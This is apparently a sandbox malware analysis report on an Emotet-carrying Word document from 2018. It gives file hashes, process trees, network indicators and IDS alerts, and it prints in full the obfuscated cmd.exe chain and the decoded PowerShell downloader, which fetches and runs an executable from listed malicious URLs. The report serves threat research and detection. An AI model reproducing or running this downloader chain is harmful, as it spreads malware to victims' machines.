File name: | Status-zu-Sendung-655219802816.doc |
Full analysis: | https://app.any.run/tasks/911b9170-3a37-49bd-bedc-283cc62bbaf5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 09:20:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 10 06:57:00 2018, Last Saved Time/Date: Mon Dec 10 06:57:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 39, Security: 0 |
MD5: | E37C8A184918213DFA0D459174F78ADF |
SHA1: | F935EBD2064D4FFE34E6734E50CBE94BB06D5651 |
SHA256: | 5E9FDD5A16D40863E969807165EE92282888D4634A60FBB5418C419FFF78C18C |
SSDEEP: | 1536:l5w1LD4fbKghmXB5luOUom8uW4k+a9oGzO04K:Tw13eKQOUo10q34K |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:10 06:57:00 |
ModifyDate: | 2018:12:10 06:57:00 |
Pages: | 1 |
Words: | 6 |
Characters: | 39 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 44 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Status-zu-Sendung-655219802816.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3912 | c:\abrutVjB\TjdiWRA\NAcKWliL\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Kt=VOBpoAEMGwNujVBQzhpVYwDFsYjXnuWH6}lx:Tm=ck'ft, yq.Cd{0g;8@\Ri(v$-aKrSULPb)+/Ie&&for %r in (63;44;5;22;39;42;19;37;22;42;55;63;8;27;18;39;28;77;21;64;4;72;26;77;40;44;46;10;77;44;49;30;77;72;50;34;60;77;28;44;55;63;69;37;59;39;42;17;44;44;18;36;75;75;21;18;44;17;77;38;77;24;49;40;4;38;75;15;51;1;57;17;44;44;18;36;75;75;21;77;67;77;24;4;34;62;77;49;40;65;75;41;70;66;57;17;44;44;18;36;75;75;44;4;38;64;24;44;77;77;51;49;40;4;38;75;15;72;57;17;44;44;18;36;75;75;17;77;67;72;34;60;77;72;77;67;38;65;28;40;4;38;38;29;28;60;44;47;34;77;65;51;77;67;24;17;60;18;65;21;65;67;51;49;4;67;54;75;35;26;54;32;40;56;57;17;44;44;18;36;75;75;18;24;47;40;17;4;34;4;54;47;34;60;72;24;49;67;29;75;29;68;1;69;42;49;68;18;34;60;44;61;42;57;42;73;55;63;71;51;72;39;42;5;34;4;42;55;63;44;28;69;46;39;46;42;56;53;32;42;55;63;21;48;22;39;42;26;37;26;42;55;63;50;19;16;39;63;77;28;62;36;44;77;38;18;74;42;58;42;74;63;44;28;69;74;42;49;77;35;77;42;55;43;4;67;77;65;40;17;61;63;41;14;10;46;60;28;46;63;69;37;59;73;52;44;67;47;52;63;8;27;18;49;22;4;21;28;34;4;65;51;23;60;34;77;61;63;41;14;10;45;46;63;50;19;16;73;55;63;51;70;7;39;42;66;66;62;42;55;76;43;46;61;61;8;77;44;64;76;44;77;38;46;63;50;19;16;73;49;34;77;28;54;44;17;46;64;54;77;46;56;53;53;53;53;73;46;52;76;28;62;4;41;77;64;76;44;77;38;46;63;50;19;16;55;63;24;60;23;39;42;14;16;5;42;55;72;67;77;65;41;55;33;33;40;65;44;40;17;52;33;33;63;26;40;31;39;42;24;71;15;42;55;79)do set Dz0m=!Dz0m!!Kt:~%r,1!&&if %r equ 79 p%TMP:~-9,1%%windir:~-7,1%ersh%TMP:~-3,1%l%ProgramFiles:~-3,1% "!Dz0m:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2440 | CmD /V:O/C"set Kt=VOBpoAEMGwNujVBQzhpVYwDFsYjXnuWH6}lx:Tm=ck'ft, yq.Cd{0g;8@\Ri(v$-aKrSULPb)+/Ie&&for %r in (63;44;5;22;39;42;19;37;22;42;55;63;8;27;18;39;28;77;21;64;4;72;26;77;40;44;46;10;77;44;49;30;77;72;50;34;60;77;28;44;55;63;69;37;59;39;42;17;44;44;18;36;75;75;21;18;44;17;77;38;77;24;49;40;4;38;75;15;51;1;57;17;44;44;18;36;75;75;21;77;67;77;24;4;34;62;77;49;40;65;75;41;70;66;57;17;44;44;18;36;75;75;44;4;38;64;24;44;77;77;51;49;40;4;38;75;15;72;57;17;44;44;18;36;75;75;17;77;67;72;34;60;77;72;77;67;38;65;28;40;4;38;38;29;28;60;44;47;34;77;65;51;77;67;24;17;60;18;65;21;65;67;51;49;4;67;54;75;35;26;54;32;40;56;57;17;44;44;18;36;75;75;18;24;47;40;17;4;34;4;54;47;34;60;72;24;49;67;29;75;29;68;1;69;42;49;68;18;34;60;44;61;42;57;42;73;55;63;71;51;72;39;42;5;34;4;42;55;63;44;28;69;46;39;46;42;56;53;32;42;55;63;21;48;22;39;42;26;37;26;42;55;63;50;19;16;39;63;77;28;62;36;44;77;38;18;74;42;58;42;74;63;44;28;69;74;42;49;77;35;77;42;55;43;4;67;77;65;40;17;61;63;41;14;10;46;60;28;46;63;69;37;59;73;52;44;67;47;52;63;8;27;18;49;22;4;21;28;34;4;65;51;23;60;34;77;61;63;41;14;10;45;46;63;50;19;16;73;55;63;51;70;7;39;42;66;66;62;42;55;76;43;46;61;61;8;77;44;64;76;44;77;38;46;63;50;19;16;73;49;34;77;28;54;44;17;46;64;54;77;46;56;53;53;53;53;73;46;52;76;28;62;4;41;77;64;76;44;77;38;46;63;50;19;16;55;63;24;60;23;39;42;14;16;5;42;55;72;67;77;65;41;55;33;33;40;65;44;40;17;52;33;33;63;26;40;31;39;42;24;71;15;42;55;79)do set Dz0m=!Dz0m!!Kt:~%r,1!&&if %r equ 79 poWershell "!Dz0m:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2420 | poWershell "$tAD='VTD';$GXp=new-object Net.WebClient;$UTR='http://wpthemes.com/QdO@http://weresolve.ca/kLK@http://tom-steed.com/Qb@http://herbliebermancommunityleadershipaward.org/xjg6c8@http://psychologylibs.ru/uSOU'.Split('@');$Pdb='Alo';$tnU = '806';$wqD='jTj';$CVz=$env:temp+'\'+$tnU+'.exe';foreach($kBN in $UTR){try{$GXp.DownloadFile($kBN, $CVz);$dLM='KKv';If ((Get-Item $CVz).length -ge 80000) {Invoke-Item $CVz;$siF='BzA';break;}}catch{}}$jcH='sPQ';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2324 | "C:\Users\admin\AppData\Local\Temp\806.exe" | C:\Users\admin\AppData\Local\Temp\806.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3236 | "C:\Users\admin\AppData\Local\Temp\806.exe" | C:\Users\admin\AppData\Local\Temp\806.exe | 806.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
756 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 806.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3380 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A72.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E49C8UPXXME1OTLV8AMD.temp | — | |
MD5:— | SHA256:— | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6474936BCF9E0E40D986D76CB8B97569 | SHA256:A429E08BF13A763B1E1B56C70E9C488FD3A3D63556417F9C15A5F53B8F3D1253 | |||
2420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2475ad.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3236 | 806.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:E07D54D1B084B31DA2F629A44B71D754 | SHA256:171A38C3568DFB7ECFC38EF44AEC0589038582C6600E0203CD629781FDE73CFF | |||
2420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\806.exe | executable | |
MD5:E07D54D1B084B31DA2F629A44B71D754 | SHA256:171A38C3568DFB7ECFC38EF44AEC0589038582C6600E0203CD629781FDE73CFF | |||
2960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$atus-zu-Sendung-655219802816.doc | pgc | |
MD5:D999127E8468654EB9E844E44CF3F208 | SHA256:DFD346B59B8F3BB57FEE87A9575F838A249B109148DFA036B6D6C6CBF5ABF266 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3380 | archivesymbol.exe | GET | — | 197.89.216.173:80 | http://197.89.216.173/ | ZA | — | — | malicious |
2420 | powershell.exe | GET | 301 | 96.30.17.180:80 | http://wpthemes.com/QdO | US | — | — | malicious |
3380 | archivesymbol.exe | GET | — | 217.165.116.167:443 | http://217.165.116.167:443/ | AE | — | — | malicious |
2420 | powershell.exe | GET | 301 | 66.84.12.179:80 | http://weresolve.ca/kLK | US | html | 294 b | malicious |
2420 | powershell.exe | GET | 200 | 66.84.12.179:80 | http://weresolve.ca/kLK/ | US | executable | 500 Kb | malicious |
3380 | archivesymbol.exe | GET | 200 | 200.25.160.121:990 | http://200.25.160.121:990/ | EC | binary | 132 b | suspicious |
2420 | powershell.exe | GET | 404 | 96.30.17.180:80 | http://www.wpthemes.com/QdO | US | html | 36.5 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3380 | archivesymbol.exe | 101.187.199.72:7080 | — | Telstra Pty Ltd | AU | malicious |
2420 | powershell.exe | 96.30.17.180:80 | wpthemes.com | Liquid Web, L.L.C | US | malicious |
2420 | powershell.exe | 66.84.12.179:80 | weresolve.ca | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | malicious |
3380 | archivesymbol.exe | 197.89.216.173:80 | — | OPTINET | ZA | malicious |
3380 | archivesymbol.exe | 200.25.160.121:990 | — | Satnet | EC | suspicious |
3380 | archivesymbol.exe | 187.147.253.144:50000 | — | Uninet S.A. de C.V. | MX | malicious |
3380 | archivesymbol.exe | 217.165.116.167:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
wpthemes.com |
| malicious |
www.wpthemes.com |
| malicious |
weresolve.ca |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2420 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2420 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2420 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2420 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |